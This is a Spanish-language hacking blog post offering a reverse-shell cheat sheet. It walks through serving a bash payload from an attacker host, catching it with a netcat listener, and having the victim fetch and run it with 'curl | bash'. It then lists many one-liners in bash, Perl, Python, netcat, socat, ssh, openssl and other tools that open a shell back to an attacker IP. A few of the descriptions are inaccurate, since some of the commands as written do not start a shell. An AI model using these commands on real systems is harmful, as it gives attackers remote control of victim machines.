lund@home:~$

Autor: Lund K. S.

Revershell cheet sheat Revershell cheet sheat | Hacker-Blog

Revershell cheet sheat

  • Primeramente debes tener ejecucion remota de comandos,
  • luego verificar si hay curl , lo haces con “ which curl”
  • luedo de la maquina atacante te abres un servidor http y creas un
  • index.html:

      	#!/bin/bash
      	bash -i >& /dev/tcp/10.10.10.10/443 0>&1
    
  • y te pones en escucha en la maquina atacante con:

      	nc -nlvp 443 
    
  • y ejecutas en la maquina victima lo siguiente

      	curl 10.10.10.10 | bash
    
  • obtendras una revershell(realizar tratamiento de la consola):

**MAS FORMAS*** *********

  • Este comando usa netcat (nc) para establecer una conexión con el sistema atacante en la dirección IP especificada y
  • el puerto 443, y ejecuta una shell inversa para permitir al sistema atacante ejecutar comandos en el sistema objetivo.

      	nc -e /bin/sh X.X.X.X 443
    
  • Este comando utiliza el intérprete de comandos “bash” y “redirecciones de descriptor de archivo” para establecer
  • una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.

      bash -i >& /dev/tcp/X.X.X.X/443 0>&1 
    
  • Este comando utiliza el lenguaje de programación Perl y las funciones de socket para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.

      	perl -e 'use Socket;$i="X.X.X.X";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    
  • Este comando utiliza el lenguaje de programación Python y las funciones de socket para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.

      	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("X.X.X.X",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    

  • Este comando utiliza el programa socat para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.
  • El comando crea un pseudo-TTY y lo conecta a través de un socket TCP.

      	socat file:tty,raw,echo=0 tcp-connect:X.X.X.X:443 
    
  • Este comando utiliza OpenSSH para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” a través del puerto 443.
  • El comando habilita un tunel inverso (reverse tunnel) en el puerto 443 del sistema objetivo, que se conecta al puerto 443 del sistema atacante.

      	ssh -R 443:localhost:443 user@X.X.X.X  
    
  • Este comando utiliza el protocolo Telnet para establecer una conexión con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443, luego ejecuta un comando shell remotamente a través de esa conexión.

      	telnet X.X.X.X 443
    
  • Este comando utiliza pipes ( tuberías) y la herramienta netcat para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.

      	mknod backpipe p && nc X.X.X.X 443 0<backpipe | /bin/bash 1>backpipe
    
  • Este comando utiliza el intérprete de comandos “bash” y redirecciones de descriptor de archivo para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.

      	/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
    
  • Este comando utiliza la herramienta openssl para establecer una conexión SSL/TLS con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443, luego ejecuta un comando shell remotamente a través de esa conexión.

      	openssl s_client -quiet -connect X.X.X.X:443
    
  • Este comando utiliza redirecciones de descriptor de archivo y sockets TCP para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” y el puerto 443.

      	exec 5<>/dev/tcp/X.X.X.X/443
    
  • Este comando utiliza xterm, una terminal gráfica para establecer una conexión de “reverse shell” con el sistema atacante en la dirección IP “X.X.X.X” en el puerto TCP/IP predeterminado para XDMCP (X Display Manager Control Protocol).

      	xterm -display X.X.X.X:0